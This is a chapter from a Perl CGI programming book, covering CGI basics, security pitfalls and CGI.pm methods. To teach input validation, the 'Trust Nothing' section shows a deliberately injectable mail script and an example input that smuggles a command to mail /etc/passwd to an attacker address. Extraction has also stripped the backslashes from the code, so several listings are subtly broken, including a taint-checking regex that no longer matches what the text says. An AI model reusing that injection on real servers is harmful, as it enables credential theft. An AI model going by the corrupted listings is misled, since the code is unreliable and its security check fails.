Ch 19 -- Developing CGIs with Perl
UNIX Unleashed, Internet Edition
- 19 -
Developing CGIs with Perl
By Matt Curtin
There are some things worth mentioning when considering CGI in Perl. (Likely,
these are reminders of things you have already learned.)
- Perl puts its environment variables into the hash (sometimes known as "associative
array") %ENV. To reference the environment variable home, you would
then use $ENV{'HOME'}.
- Much of this chapter will deal with using a Perl module known as CGI.pm,
or one of its more task-specific friends. (Perl "modules" are analogous
to C++ or Java "classes." These are simply components of the software that
provide "methods" to your programs. Methods are just OO-speak for functions.)
- Many of the code examples here are only "snippets," which need to be
incorporated into CGI programs in order to actually run.
Why Perl?
Why not?
Actually, there are quite a few reasons to use Perl. Perl is a mature, portable,
and flexible programming language. Such tasks as reading, writing, and mangling text
are ideally done in Perl. A great deal of CGI programming is essentially text processing,
sometimes in fairly creative ways, which makes Perl well-suited to the task of CGI
programming. Additionally, there is a large base of free modules to make the task
of CGI programming even easier, and many freely available programs which you can
modify for your own needs, or learn new techniques. Let's consider some needs of
CGI programs in more detail, and compare Perl with some other languages.
Requirements of a CGI Language
You can use just about any programming language to write CGI programs--Shell,
Scheme, C, Java, you name it. If it's a real programming language, you can write
CGI with it. Not that doing so is a good idea, but you can even write CGI programs
using something like BASIC. The point is that there's a difference between a language
you can use and a language that you should use.
The language that you use for CGI should fit the application, just as in any other
programming task. Typically, CGI programs perform tasks such as pattern matching,
interfacing to databases, and generating HTML dynamically. Perl is by far the most
popular CGI programming language because it is suited so well to these types of tasks.
In the following sections, I briefly compare Perl to some other programming languages
that you can use for CGI programming. I do so strictly from the perspective of the
needs of good language for CGI programming.
Perl Versus UNIX Shell UNIX shell scripts tend to be highly portable across
various platforms. A number of trade-offs exist, though, in that shell scripts tend
to be much slower than the same script implemented in Perl, C, or some other language
that performs compilation of the entire program before it can be executed. You can
handle deficiencies in the shell's capability to perform serious file manipulation
by using tools such as awk, but even awk has limitations that could be significant
in a CGI environment (such as being able to have only one file open at a time). As
a result, shell is typically useful only for the smallest of scripts, such as simple
<ISINDEX> gateways to services such as finger, archie, or other command-line
tools, where you're only interested in seeing the results. Even in these cases, if
you want to manipulate the results, or convert them from standard text to HTML, perhaps
making appropriate words links to related or explanatory pages, Perl becomes a better
option.
Perl Versus C/C++ Some CGI programmers prefer to use C, often because it's
simply what they know. CGI programs implemented in C suffer from a number of problems,
though: they're more likely to be susceptible to bugs in string handling or memory
management that might even turn out to be security bugs. C is a great language for
implementing systems that were done in assembler before C came about (such as operating
systems) because it is very fast and allows the programmer to perform very low-level
functions from a higher-level language that is more portable (than assembler) across
architecture types.
CGI programs implemented in C, however, require at least a recompile for the target
platform. If you're making a jump from one type of system to another, rewriting some
parts of the program might even be required. C forces the CGI programmer to deal
with other tasks (such as memory management) that only get in the way of accomplishing
the task at hand. Further, its capability to do pattern matching is far behind that
of Perl's. True, you can add pattern matching functionality, but that's additional
overhead that must be compiled into your CGI program, rather than simply being an
internal function, as it is in Perl.
I wouldn't implement an operating system in Perl (although I'm sure some people
would), and I wouldn't implement a CGI program in C (although some do). Use the right
tool for the job.
Perl Versus Java The entire world has become abuzz with talk of Java. For
this reason, some programmers have tried to use Java for everything, including CGI.
Doing so presents a number of advantages; however, they currently seem to be outweighed
by the consequences. Java's strengths include portability and simplicity. Remember,
though, that data is passed to a CGI application through the operating system's environment.
As Java does not support access to environment variables (because of portability
issues), a programmer needs to write a wrapper that will read the environment, and
then invoke the Java program using a command-line interface, with the appropriate
environment variables defined as properties.
Java is very much in the same boat as C when it comes to functionality. Although
the Java programmer is significantly less inclined to cause bugs due to silly errors
than the C programmer is, the Java programmer ends up having to implement nearly
everything himself or herself either in the CGI program, or having to distribute
a number of requisite classes along with the program. Much of the promise of Java
has already been fulfilled in Perl, especially in the realm of CGI programming. Unless
Java does some job much better than Perl, relating specifically to the program you're
planning to develop, Perl is a much better language for CGI programming.
If you do have a task to perform that really is best done in Java, it's probably
best to not use CGI, but rather "servlets," or some other server-specific
API. Of course, in doing this, you might lose the server-portability that you have
in using CGI.
How Perl Does CGI
Some basic understanding of Perl does CGI will be useful before we go forward.
If you're already experienced with CGI programming, you might like to skip ahead
to the next section, or glance over this section, looking for reminders.
Making the Server Able to Run Your Program
Remember, before a CGI program can run, several things will need to have taken
place:
- The HTTP server will need to have been told that your program is a CGI program,
either by the directory it's under (such as somewhere under cgi-bin), or
the file extension (such as .pl or .cgi). Consult your server's
documentation for how to do this.
- The operating system will have to allow its execution. This requires that the
"execute bit" be turned on for the CGI program file. This can be done with
the chmod(1) command, like
chmod +x myprogram.pl
- The location of the Perl interpreter must be specified in the first line of code.
In all of these examples, I use /usr/bin/perl. If Perl is installed somewhere
else on your system, either change the first line to have the correct path to the
Perl interpreter, or create a symbolic link so that /usr/bin/perl will reference
the correct file. Incidentally, this is also the line that important flags such as
-T and -w need to be specified if you choose to do so. (Use of
these flags is considered later.)
Some Examples
At this point, it would be useful to consider some example CGI programs. Remember,
the web browser will need to be told the content type of the data coming its way
in the HTTP header. Once this has been done, the data itself can come down, and will
be interpreted properly by the browser. In the case of HTML, you'll need to have
the HTTP header indicate the content type as text/html, send two newlines (to mark
the end of the header and the beginning of the data), and then the HTML.
Your First CGI Program in Perl Of course, the classic first program in
any language is "Hello, world!" Likely, you've already seen this in Perl.
In Listing 19.1, you'll see it again, with a twist: it's a CGI program.
Listing 19.1. "Hello, world"
#!/usr/bin/perl -Tw
print <<EOD;
Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<title>Hello, world!</title>
</head>
<body>
<h1>Hello, world!</h1>
</body>
</html>
EOD
Note the double newline between the last HTTP header (Content-type: text/html)
and the first line of data (<html>). If you're missing this, your
program will not work properly.
Of course, this isn't really very interesting, since we could have achieved the
same result by writing a standard HTML file. However, the power of CGI becomes a
bit more obvious when looking at something slightly more fancy: tell the user the
result of the uptime(1) command, which is what we do in listing 19.2.
Listing 19.2. Fancy "hello, world"
#!/usr/bin/perl -Tw
$ENV{'PATH'} = "";
$|=1;
print <<EOD;
Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<title>Fancy hello world!</title>
</head>
<body>
<h1>Hello world!</h1>
How long has this system been up?
<pre>
EOD
system("/usr/bin/uptime"); # for Solaris, *BSD, Linux
# system("/usr/bsd/uptime"); # for IRIX
print <<EOD;
</pre>
</body>
</html>
EOD
echo.pl: Seeing CGI Environment Variables Listing 19.3 has another
program that should prove to be interesting: a Perl version of the popular echo.sh
program that has come with a number of different HTTP servers, including NCSA's HTTPd
and Apache. We're simply walking through the %ENV hash, and returning each key (environment
variable), and its value, as a plain text file.
Listing 19.3. Perl Translation of echo.sh
#!/usr/bin/perl -Tw
print "Content-type: text/plainnn";
foreach $key(keys %ENV) {
print "$key=$ENV{$key}n";
}
Listing 19.4 is the same thing, except a bit fancier, using HTML tables:
Listing 19.4. Fancy CGI Environment Viewer
#!/usr/bin/perl -Tw
print <<EOD;
Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<title>What's our environment, anyway?</title>
</head>
<body>
<h1>What's our environment, anyway?</h1>
<table border>
<caption>Environment variables and their values</caption>
<TR>
<th>Variable</th>
<th>Value</th>
</TR>
EOD
foreach $key(sort keys %ENV) {
print "<tr><td> $key </td><td> $ENV{$key} </td></tr> n";
}
print <<EOD;
</table>
</body>
</html>
EOD
perldoc.pl: A Web Front-End to perldoc(1) Now let's invent
a problem that might actually exist. You have found perldoc(1) to be incredibly
useful. You would like to be able to use it from home, but don't want to do so through
a telnet(1) window; you'd rather use your browser.
This is an easy task. The next listing shows a very simple <ISINDEX>
interface to the perldoc(1) command, which demonstrates simple text processing
and handling of (potentially dangerous) user input.
Notice the URL when perldoc.pl is run the first time. Then submit a query,
and notice the URL. Your submission becomes part of the URL, in the query string.
To perform the lookup of the submitted command, we run it through a regular expression
and then use a back reference to assign the value of the query string to $query.
Remember, input from users is potentially dangerous, so we need to be sure that we're
not allowing shell metacharacters anywhere near a shell. The regular expression /^(w+)$/
will ensure that only alphanumeric characters are left in the variable. However,
Perl's -T switch will still flag this data as "tainted", that
is, untrusted, and potentially dangerous. By assigning the value to a new variable
with the back reference $1, we tell Perl that we know what we're doing,
so, Perl allows us to proceed.
(As an aside, it's noteworthy that the result of a perldoc(1) request
is in the same format as a man(1) request: nroff with man
macros. Because of this, only minor modifications are needed to perldoc.pl
to create a front end to man(1). Why not give that a try?)
Listing 19.5. Webified perldoc(1)
#!/usr/bin/perl -T
$ENV{'PATH'} = "/bin:/usr/bin:/usr/local/bin";
$ENV{'QUERY_STRING'} =~ /^(w+)$/; # matches only alphanumerics and _
$query = $1; # tell perl not to worry, we've detainted
print <<EOD;
Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
</head>
<body bgcolor="#ffffff">
<title>perldoc $query</title>
<center>
<h1><code>perldoc</code> Interface</h1>
</center>
<isindex>
<h2>$query</h2>
<pre>
EOD
# Don't bother running the command if there's no argument
if ($query) {
open(PERLDOC, "/usr/local/bin/perldoc $query |") || die "Cannot perform perldoc query!";
while(<PERLDOC>) {
s/.ch//g;
s/</</g;
s/</>/g;
print;
}
}
close PERLDOC;
print <<EOD;
</pre>
<hr>
<address><a href="http://www.research.megasoft.com/people/cmcurtin/">C
Matthew Curtin</a></address>
</body>
</html>
EOD
At this point, you should have some understanding of how Perl works with CGI.
You can imagine a number of things that we haven't covered yet, like how to handle
cookies, process more complex user input, forms, and so on. Even potentially difficult
tasks are made quite a bit more simple with the CGI.pm module. We'll cover its use
through the rest of the chapter.
CGI Programming Concerns
Would you connect your machine to the Internet if you knew that doing so would
enable people to run commands on your machine? What if that machine has all your
personal and private data on it? What if that machine is your company's Web server?
Well, keep in mind that's exactly what CGI is. A remote user, most often someone
who hasn't gone through any kind of authentication--and someone who can't easily
be tracked down (if at all)--is running programs on your Web server. I can't emphasize
enough that this situation can be very dangerous. So let me say again: This situation
can be very dangerous.
CGI is dangerous.
The nice thing about CGI on your Web server is that the programs that people are
running on your machine are programs you've written. (You have control over what's
on your server and what it can and can't do.) The bad thing about CGI on your Web
server is that the programs that people are running on your machine are programs
you've written. (Although you might write programs that are very nice and that do
only what you want them to, you might be surprised to find out what else a naughty
person can make them do.)
Trust Nothing
Consider the code in Listing 19.6. This little CGI program, which is sitting on
your company's Web server, is called when a user enters an e-mail address to get
more information about your company's New SuperWidgets.
Listing 19.6. SuperWidget Autoresponder.
#!/usr/bin/perl
use CGI;
$query = new CGI;
$email_addr = $query->param('email');
open(MAIL, "| Mail -s 'More information' $email_addr");
print MAIL <<EOD;
Thank you for your request.
Here at The Very Big Corporation of America, we think that
our SuperWidgets(tm) are pretty cool, and we hope you agree.
Sincerely,
Joe Mama
President, and Chief Executing Officer
EOD
Isn't that easy? Isn't Perl great? Now, you can just slap this bad boy up on the
server, and you're all done. Right? Wrong. Sure, the program can do what you think
it will, but it might also do something you haven't thought about. If someone claims
that his e-mail address is something like
sillyname@sillyplace.com ; /bin/mail badboy@naughty.no < /etc/passwd
you might have a bit of a problem. Namely, badboy@naughty.no just got
a copy of your password file. Oops.
The lesson here is obvious: don't trust any input from users. Remember, CGI programs
are programs that run on your server. If these programs can be fooled into performing
a task beyond what you've anticipated, you can have very serious security problems.
Fortunately, Perl has an extremely useful -T switch, which would tell you about the
vulnerability here and refuse to run. Don't even think about running a CGI program
without specifying the -T switch. This is done by adding it to the end of the line
specifying the path to Perl, making it look like:
#!/usr/bin/perl -T
You especially need to consider this situation if you have any sort of "secure"
service on the server, such as forms served by SSL that are used to get credit card
numbers or other sensitive data from customers or partners. The more data that you
have on the machine that is attractive to bad guys, the greater resources that they'll
spend trying to get at what you're attempting to hide.
Another important consideration is that you don't really know what you're talking
to on the other side of that connection. It might not be a browser at all, but rather
someone who used telnet to talk to your HTTP port, attempting to interact with your
daemon or programs in ways you haven't thought about. You have good reason to be
paranoid about this problem.
Common Pitfalls with CGI Programs in Perl
Perl is a wonderfully powerful language. You do need to be careful while writing
CGI programs to avoid common pitfalls, however. Some of them are related to functionality,
whereas others are related to security. Keep them all in mind, and remember to make
your programs functional and secure. Now take a look at some of my favorite pitfalls:
- Passing unsafe data to shells
- This problem is, by far, the worst for new (and careless) Perl programmers. An
example is cited in listing 19.6. Listing 19.5 also had potential for that, since
we used a shell (when we opened the PERLDOC file handle), but our handling
of $ENV{'QUERY_STRING'} and turning it into $query took care of
this problem. If you possibly can, you're almost always best off avoiding the use
of shells in CGI programs.
- Making assumptions about the environment
- Many people write programs assuming that other programs and files in the system
will be where they are on their system. In practice, programs and configuration files
might be in another place, or not even exist, on an operating system from another
vendor. In making such assumptions, Perl's extreme portability is hindered, and you
have to rework the programs when moving from one environment to another. I like to
keep dependencies on external resources (such as the shell or underlying UNIX commands)
to a minimum, not using them at all unless I can't avoid doing so for some reason,
which is a pretty rare event. (However, in listing 19.5, you'll note that we did.
In this case, the program would have become more complex to avoid using the shell,
so it made more sense to just use a shell, and detaint the user's input ourselves.)
- Having file permission problems
- Remember, the program is going to be run under the UID of the HTTP daemon on
your system. You need to be sure that the HTTP daemon has read access to the program,
that the program has the execute bit turned on, and that any files that will be read,
written, created, or deleted can have whatever you need done to them under the UID
of the HTTP daemon.
- Failing to perform sufficient error checking
- Do yourself a favor, and check for error conditions. When your program encounters
an unexpected error on an open() or fork() or anything else, rather than have it
silently stop working, use die() to make it complain loudly about the problem. Notice
how listing 19.5 uses die() with the open(). If perldoc isn't in /usr/local/bin/,
or if some other error occurs, use of that die() could save you a lot of
time hunting down and eradicating the problem.
- Not taking advantage of useful Perl options
- Here's a fun way to waste lots of time trying to find stupid mistakes. We've
already mentioned -T, but let me emphasize again: don't ever run CGI Perl programs
without it. Also, another useful switch is -w. This will give you warnings about
potential problems in your code. Never test code without -w specified. If you are
getting warnings when -w is specified, you're best off solving them, not making them
"go away" by removing -w. On the other hand, if you are getting a warning,
you know what it means, why it's being made, and that it won't create problems for
you, it might be all right to remove -w when moving your program to production.
- Not taking advantage of useful Perl modules
- Much of the work in providing interfaces to data, parsing capabilities, and so
on already exists. Instead of having to implement them, you'll be much more productive
using that which is already available. You should definitely use the several extremely
cool CGI Perl modules if you're writing any CGI that's more than a few lines long.
In fact, if you don't have CGI.pm, go get it right now. I can wait. Done? Good, you're
going to need it in the next section.
- Forgetting to flush STDOUT
- Good CGI programmers tell their programs to flush the STDOUT output buffer after
each write. This way, the MIME type gets out (and the browser can see it) before
the program goes down in flames. (This is done by setting $| to a nonzero value.
Notice listing 19.2. Comment out the line where I set the value of $| and the run
the program again. See the difference? When the output buffered, the result of uptime(1)
is returned before the rest of the program's output. This is clearly bad, so be sure
to set $| to something nonzero for your CGI programs.)
Introduction to CGI.pm
Using CGI.pm
Using CGI.pm is easy. To write a CGI program, you simply need to create a new
CGI object, throw some parameters at it, and a new CGI program is born. Now take
a look at some code snippets, and see what each one does.
You create a new CGI object just as you would create any other Perl object:
use CGI;
$cgi = new CGI;
You can also create CGI objects and feed them parameters at the same time. For
example, if you want to send some parameters in via an open file handle, you simply
need to reference the file handle glob you want. It can be STDIN, some file
with key/value pairs used for debugging, or just about anything else, as you can
see here:
$cgi = new CGI(*STDIN);
(In reality, you could just use the file handle name, but passing the glob reference
is the official method of passing file handles, which is why I show it here. The
* character, in this context, is often known as a "glob", a wildcard character
that will match anything. Hence, a "globbed" file handle like *STDIN
will include $STDIN, @STDIN, and %STDIN.)
Additionally, you can hardwire associative array key/value pairs into the new
object being created this way:
$cgi = new CGI({ 'king' => 'Arthur',
'brave' => 'Lancelot',
'others' => [qw/Robin Gallahad/],
'servant' => 'Patsy'});
Another useful initialization option is to pass a URL style query string, as follows:
$cgi = new CGI('name=lancelot&favoritecolor=blue');
And, of course, you can create a new CGI object with no values defined:
$cgi = new CGI('');
When to Use CGI.pm
As with all tasks when you're programming in Perl, you can find more than one
way to do the job. In my experience, if the program is more complex than what can
be reasonably accomplished in a few lines of code, or will require the parsing of
input from the user that is more complex than what can be obtained through environment
variables, then using CGI.pm is the way to go.
In the first example, in which the user's browser type is checked, doing the job
without CGI.pm is just as easy doing it with CGI.pm. In such cases, I typically do
not use CGI.pm. These times are fairly rare, however; most of the time you use CGI,
you do so because someone wants to give some level of feedback to the server, which
means that the server needs to be able read the data and make it useful.
Sometimes you might need a specific part of CGI.pm but don't want the whole thing,
perhaps because you're optimizing for speed, or don't want to use the extra memory
of the whole CGI.pm module. In these cases, you can use a number of related modules
geared toward more specific tasks to give you some of the features you're looking
for in CGI.pm without the overhead.
You can find the WWW-related modules (including CGI) on the Web at
http://www.perl.org/CPAN/modules/by-category/15_World_Wide_Web_HTML_HTTP_CGI/
In the end, most often you'll find using CGI.pm or a related CGI module more advantageous
than doing the work yourself. In addition to CGI.pm's convenience, there
are some extra security checks to help keep you from being caught doing stupid things.
Use the tools available, unless the job is so small that they'll make more work for
you.
Some CGI.pm Methods
In this section, I've included examples to highlight some of the features that
I've found particularly useful in CGI.pm. Check the documentation for the complete
(and current) list of available features. I hope that the information I present here
is enough for you to understand how CGI.pm works so that when you see other features
in the documentation, you'll be able to begin using them quickly.
Much of this section has been adapted from the CGI.pm documentation, by
Lincoln Stein
<lstein@genome.wi.mit.edu>
http://www.genome.wi.mit.edu/~lstein/
and has been used with permission.
- keywords()
- You can fetch a list of keywords from an <ISINDEX> query by using the keywords()
method. For example,
@keywords = $cgi->keywords
- param()
- You use this method to get and set the names and values of parameters. If you
need to know all the parameters (that is, their names) that were passed to your program,
you can use the param() method this way:
@params = $cgi->param
- To get the value of a given parameter, simply pass the name of the parameter
whose value you want to fetch to the param() method. If more than one value is available
for the given parameter, the method returns an array; otherwise, it returns a scalar.
$value = $cgi->param('foo'); # for scalars
@values = $cgi->param('foo'); # for arrays
- Setting values is similarly easy. Passing an array to the parameter results in
your having a multivalued parameter. This capability is useful for a number of purposes:
initializing elements of a fill-out form, changing the value of a field after it
has already been set, and so on.
$cgi->param( -name => 'foo',
-values => ['first', 'second', 'third', 'etc.']);
- append()
- If you need to add information to a parameter, you can use the append() method
as follows:
$cgi->append( -name => 'foo',
-values => ['some', 'more', 'stuff']);
- delete()
- This method, as the name suggests, deletes a parameter.
$cgi->delete('foo');
- delete_all()
- This method deletes all parameters, leaving an empty CGI object.
$cgi->delete_all();
Importing CGI.pm Methods into the Current Namespace
The use CGI statement imports method names into the current namespace. If you
want to import only specific methods, you may do so as follows:
use CGI qw(header start_html end_html);
It's possible that you'll want to import groups of methods into the current namespace
rather than individual methods on a one-by-one basis. Simply specify which method
family you want this way:
use CGI qw(:cgi :form :html2);
Be aware, however, that this makes the source code a bit more difficult to follow
for someone else. Additionally, this isn't considered "good OO" practice.
By importing the methods directly into your current namespace, it will be much more
difficult to maintain and expand the program. Should you find yourself in a situation
where you want to use more than one CGI object, for example, it will become confusing
to keep track of which object you're referencing. Consider yourself warned.
The following are the method families available for you to use:
- :cgi
- These tags support the CGI protocol, including param(), path_info(),
cookie(), request_method(), header(), and so on.
- :form
- All the form-generating methods live here.
- :html2
- html2 shortcuts such as br(), p(), and so on are here,
as well as close-enough-to html2 methods such as start_html() and
end_html().
- :html3
- html3.2 tags such as html3 tables live here.
- :netscape
- Netscape-isms that aren't html3 are here. Some examples are frameset(),
blink(), and center().
- :html
- This family is a union of html2, html3, and Netscape.
- :standard
- This family is a union of html2, form, and cgi.
- :all
- This family is a union of everything.
If you want to use a tag that someone implements, you can do so and still use
it in your local namespace by using the :any method family, as in the following example.
Using this family causes any unrecognized method to be interpreted as a new HTML
tag. Beware that typos are interpreted as new tags.
use CGI qw(:any :all);
$q=new CGI;
print $q->newtag({ parameter=>'value',
otherParameter=>'anotherValue'});
Saving State via Self-Referencing URL
A simple way of saving the state information is to use the self_url()
method, which returns a redirect URL that reinvokes the program with all its state
information. Here's the syntax:
$my_url = $cgi->self_url;
You can get the URL without all of the query string appended by using the url() method instead:
$my_url = $cgi->url;
Another method of saving state information is to use cookies. I talk about how
to use them later in the chapter.
CGI Functions That Take Multiple Arguments
Although I provided an example like the following already, it's important enough
to emphasize. If you want to create a text input field, for example, you can do so
like this:
$field = $cgi->textfield( -name => 'IQ',
-default => '160');
A nice side effect of being able to pass these specified arguments to a function
is that you can give arguments to tags, even if the CGI module doesn't know about them.
For example, if in some future version of HTML, the align argument is recognized, you can
simply start using it like this:
$file = $cgi->textfield( -name => 'IQ',
-default => '160',
-align => 'right');
HTTP Headers
The header() method, as shown here, prints out the appropriate HTTP header
and a blank line beneath (to separate the header from the document itself). If no
argument is given, the default type of text/html is used.
print $cgi->header('text/html');
You can specify additional header information the same way you pass multiple arguments
to any object:
print $cgi->header( -type => 'text/html',
-status => '',
-expires => '+1h',
-cookie => $my_chocolate_chip);
You can even make up your own as in the following example:
print $cgi->header( -type => 'text/html',
-motto => 'Live Free or Die!');
Of course, making up your own header doesn't have much point because usually the
only thing that sees the headers is a browser. However, that does mean that if a
new version of HTTP is released and has headers that you want to use, you can do
so without waiting for a new version of CGI.pm.
You can specify the following:
- -type
- This is the MIME type of the document that the CGI program returns. In this case,
it's text/html. Any MIME type is valid here.
- -status
- This optional field is the HTTP status code. You might want to use it if your
CGI returns cached information that it gets from other servers; here's an example:
print $cgi->header( -type => 'text/html',
-status=> '203 Non-Authoritative Information');
- -expires
- Generally, browsers don't cache the results of CGI programs, but some naughty
browsers might, and sometimes proxy servers do also. You can limit the amount of
time that such dynamically generated pages will be cached through this mechanism
as follows:
tabular175
- -cookie
- You can use this parameter to generate a header that tells Netscape (and browsers
that wish they were Netscape, like Internet Explorer) to return a cookie for each
request made of this program. You can use the cookie() method to create and retrieve
session cookies.
- redirect()
- You can send a redirection request for the remote client, which immediately goes
to the specified URL. (You should always specify absolute URLs in redirections; relative
URLs do not work properly.)
print $cgi->redirect('http://my.other.server/and/then/some/path');
HTTP Session Variables
Most of the environment variables that you use in creating CGI programs, including
the ones discussed at the beginning of this chapter, are available through this interface.
A list of methods follows, along with a brief description of each.
- accept()
- This method returns the list of MIME types that the remote client accepts. If
you give this method a MIME type as an argument, (for example, $cgi->accept('image/gif'),
it returns a floating-point value ranging from 0.0 ("Don't want it") to
1.0 ("Okay, I'll take that") that tells you whether the browser wants it.)
- auth_type()
- If the page is protected by an authentication scheme, the authorization type
is returned. In HTTP/1.0, the only possible type of authentication is "basic".
In HTTP/1.1, this could be either "basic" or "digest". Other
server-specific schemes might be possible; consult your HTTP server's documentation
to be sure.
- raw_cookie()
- This method returns a Netscape magic cookie in its raw state. Typically, you
can perform any cookie manipulation that you might want to do at a higher level via
the cookie() method.
- path_info()
- This method returns any path information that has been appended to your program
in the HTTP request. For example, if your program performs redirects, and it is invoked
using the path /cgi-bin/programname/some/other/path, then path_info()
returns /some/other/path.
- path_translated()
- This method is the same as path_info(), except that path information
is translated into the physical pathname, such as /var/www/cgi-bin/programname/some/other/path.
- query_string()
- This method returns the path information that has been appended to your program.
This information could include options and arguments that you might use for maintaining
state information.
- referer()
- This method returns the URL of the page that linked the user to your program.
- remote_addr()
- This method returns the IP address of the remote host (that is, the client) in
dotted-quad form.
- remote_ident()
- This method returns the identity of the person on the remote host making the
request. This method works only if the remote system has the identd service
running.
- remote_host()
- This method returns the name of the remote host, if it is known. Otherwise, it
returns the IP address.
- remote_user()
- This method returns the name of the user who has been authenticated on your server.
- request_method()
- This method returns the HTTP method used to request your program's URL (for example,
GET, POST, or HEAD).
- script_name()
- This method returns the program name as a partial URL. This method is useful
for programs that reference themselves.
- server_name()
- This method returns the name of the server on which the program is running.
- server_port()
- This method returns the port number that the local Web server is using.
- user_agent()
- This method returns the remote user's client software identification. You might
be interested in watching this response to see how many browsers claim to be Mozilla
(Netscape Navigator).
- user_name()
- This method returns the remote user's name. This method typically doesn't work,
although it does work on some older browsers such as early versions of NCSA Mosaic.
HTML from CGI.pm
Now you're ready to look at some useful parameters to create HTML headers and
the HTML document itself:
- -title
- This parameter indicates the title of the document. (The argument to this parameter
ends up between the <TITLE> and </TITLE> tags.)
- -author
- This parameter indicates the author's e-mail address.
- -script
- You use this parameter to incorporate JavaScript into your HTML. Here you need
to define all the JavaScript methods that you intend to use at the occurrence of
events (such as the submission of a form, the changing of contents of a field, and
so on). You learn how to invoke the methods defined here in the section on JavaScript.
- CGI.pm doesn't write the JavaScript for you; it simply provides a way
for you to incorporate JavaScript into your dynamically generated HTML. To use so,
you need to know how to use JavaScript. Consider this example:
$cgi = new CGI;
print $cgi->header;
$JAVASCRIPT=<<END;
// This is a super simple example of incorporating JavaScript in a
// dynamically generated HTML page.
window.alert("Click on OK!");
END
print $cgi->start_html( -title => 'Some sort of silliness',
-script => $JAVASCRIPT);
Unpaired HTML Tags
You create tags that are unpaired such as <BR>, <HR>,
and <P> as follows:
print $cgi->p;
Paired HTML Tags
Other tags, such as <I> and <B> are paired. You
create them like this:
print $cgi->i("Here is some text to be italicized.");
You can even embed tags within tags as follows:
print $cgi->i("Here is some", print $cgi->b("bold text"), "to be italicized");
Some Pitfalls to Avoid
Although you can use almost any of the HTML tags that you might expect via lowercase
function calls of the same name, in some cases they conflict with other methods in
the current namespace.
You might want to make a <TR> tag, for example, but tr()
already exists in Perl as a character translator. You therefore can use TR()
to generate the <TR> tag. Also, you make the <PARAM>
tag via the PARAM() method because param() is a method of the CGI
module itself.
HTML Fill-Out Forms
Remember, the methods for creating forms return the necessary HTML-marked-up text
to make the browser display that you want. You still need to print the strings after
you get them from the methods. Also, the default values that you specify for a form
are valid only the first time that the program is invoked. If you're passing any
values via the query string, the program uses them, even if the values are blank.
You can use the param() method to set a field's value specifically if
you want to do so. (You might want to use this method to ignore what might be in
the query string and set it to another value you want.) If you want to force the
program to use its default value for a given field, you can do so by using the -override
parameter.
So, this bit of CGI
print $cgi->textfield(-name => 'browser',
-default => 'Mozilla');
uses the value Mozilla in the browser text field the first time it's invoked.
However, if the query string includes browser=InternetExploder, then the
text field uses this value instead.
To prevent this situation from happening, you can change your CGI to look like
this:
print $cgi->textfield( -name => 'browser',
-default => 'Mozilla',
-override => 1);
Now, the text field always has the default value of Mozilla, regardless of the
value in the query string.
If you want to force defaults for all fields on the page without having to specifically
tell each one to override values from the query string, you can use the defaults()
method to create a defaults button, or you can construct your program in such a way
that it never passes a query string back to itself.
Although you can put more than one form on a page, keeping track of more than
one at a time isn't easy.
Text that you pass to form elements is escaped. You therefore can use <my@email.addr>,
for example, without having to worry about it somehow being sent to the browser,
which would think that you've just sent it a strange tag. If you need to turn off
this feature (so that you can use special HTML characters such as ©
([cw]), then you can do so this way:
$cgi->autoEscape(undef);
To turn the feature back on, try the following:
$cgi->autoEscape('yes');
<ISINDEX>
To create an <ISINDEX> tag, you can use the isindex()
method as follows:
print $cgi->isindex($action);
Starting and Ending Forms
The startform() and endform() methods exist so that you can
start and end forms as follows:
print $cgi->startform($method, $action, $encoding);
print $cgi->endform;
Two types of encoding are available:
- application/x-www-form-urlencoded
- This approach is the standard way of submitting data to a server-based form.
- multipart/form-data
- You can use this new encoding option, introduced in Netscape 2.0, to send large
files to the server. It's useful for Netscape's file upload feature within forms.
You really don't need to use this encoding method if you're not going to use the
file upload feature of browsers.
Additionally, you can use JavaScript in your forms by passing the -name
and -onSubmit parameters. (A good use of this feature is validation of form
data before submission to the server.) A JavaScript button that allows the submission
should return a value of true because a false return code aborts the submission.
Creating a Text Field
The textfield() method, shown here, returns a single-line text input
field. -name is the name of the field, -default is the default
value for the field, -size is the size of the field in characters, and -maxlength
is the maximum number of characters that can be put into the field.
print $cgi->textfield( -name => 'hours',
-default => 40,
-size => 3,
-maxlength => 4);
Creating a Multi-Line Text Area
You can create a multi-line text area as follows:
print $cgi->textarea( -name => 'comments',
-default => 'My, what great stuff you have!',
-rows => 5,
-columns => 50);
Password Field
password_field() is the same as textfield(), except that asterisks
appear in place of the user's actual keystrokes.
File Upload Field
The following method returns a form field that prompts the user to upload a file
to the Web server:
print $cgi->filefield( -name => 'passwd_file',
-default => 'Some value',
-size => 16384,
-maxlength => 32768);
-name is required for the field, -default is the starting value,
-size is the size of the field in characters, and -maxlength is
the maximum number of characters that can be submitted.
You should use the multipart form encoding for uploading files. You can do so
by using the start_multipart_form() method or by specifying $CGI::MULTIPART
as the encoding type. If multipart encoding is not selected, the name of the file
that the user selected for upload is available, but its contents are not.
Remember, you can use the query() method to get the name of the file.
Conveniently, the filename returned is also a file handle. As a result, you can read
the contents of a file that the user uploaded with code like the following:
$uploaded_file = $cgi->param('uploaded_file');
while(<$uploaded_file>) {
print;
}
Binary data isn't too happy with this kind of while loop, though. In fact, if you
want to save the user-uploaded file someplace, as you would if the user were uploading,
for example, a JPEG image of a new car, you might do so with some code like this:
open(NEWFILE, ">>/some/path/to/a/file") || die "Cannot open NEWFILE: $!n";
while($bytesread=read($uploaded_file, $buffer, 1024)) {
print NEWFILE $buffer;
}
close NEWFILE;
Pop-Up Menus
You can use the popup_menu() method to create a menu. -name
is the menu's name (required), and -values is an array reference containing
the menu's list items. You can either pass an anonymous array, or a reference to
an array, such as menu_items (required). -default is the name of
the default menu choice (optional). -labels lets you pass an associative
array reference to name the labels that the user sees for menu items. If unspecified,
the values from -values are visible to the user (optional).
print $cgi->popup_menu( -name =>'menu_name',
-values =>['one', 'two', 'three'],
-default =>'three',
-labels =>{'one'=>'first','two'=>'second',
'three'=>'third'});
Scrolling Lists
The method for creating scrolling lists is, of course, scrolling_list():
print $cgi->scrolling_list( -name=>'list_name',
-values=>['one', 'two', 'three'],
-default=>['one', 'three'],
-size=>4,
-multiple=>'true',
-labels=>%labels);
-name and -values are the same as they are in pop-up menus.
All other parameters are optional. -default is a list of items (or single
item) to be selected by default. -size is the display size of the list.
